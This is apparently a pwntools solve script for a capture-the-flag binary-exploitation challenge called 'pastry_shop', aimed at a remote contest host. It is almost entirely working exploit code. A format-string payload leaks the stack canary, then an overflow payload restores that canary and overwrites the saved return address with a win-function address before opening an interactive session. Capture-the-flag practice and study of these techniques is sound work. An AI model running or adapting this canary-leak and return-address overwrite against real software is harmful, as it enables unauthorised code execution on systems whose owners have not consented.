#!/usr/bin/env python3
"""Solve script for the "pastry_shop" pwn challenge.

Two stages against the remote service:
  1. A format-string read on the first prompt leaks the stack canary
     (stack argument slot CANARY_IDX).
  2. A buffer overflow on the second prompt rewrites the saved return
     address with the win function, replaying the leaked canary so the
     stack-protector check still passes.
"""
from pwn import *

# elf = context.binary = ELF('./pastry_shop', checksec=False)
# Slot index for `%<n>$lx` that lands on the canary (located by walking
# the stack with a `%lx.%lx.%lx...` probe).
CANARY_IDX = 23
OFFSET_TO_CANARY = 72  # bytes from the start of the input buffer to the canary
OFFSET_TO_RIP = 88     # bytes from the start of the input buffer to the saved RIP
win_addr = 0x00000000004012C2  # presumably the win function — confirm against the binary

# io = process(elf.path)
io = remote("offsec.m0lecon.it", 13538)

# --- stage 1: leak the canary ---------------------------------------------
io.recvuntil(b"dear customer?\n")
io.sendline(f"%{CANARY_IDX}$lx".encode())
canary_hex = io.recvline().strip()  # assumes the reply is exactly the hex value
canary = int(canary_hex, 16)
log.info(f"canary = {canary:#x}")

# --- stage 2: overflow the second prompt -----------------------------------
io.recvuntil(b"to order?\n")
# Gap between the canary and the saved RIP (the saved RBP), filled with junk.
saved_rbp_gap = OFFSET_TO_RIP - OFFSET_TO_CANARY - 8
chain = [
    b"A" * OFFSET_TO_CANARY,  # pad up to the canary
    p64(canary),              # keep the canary intact
    b"B" * saved_rbp_gap,     # clobber saved RBP
    p64(win_addr),            # new return address
]
io.send(b"".join(chain))
io.interactive()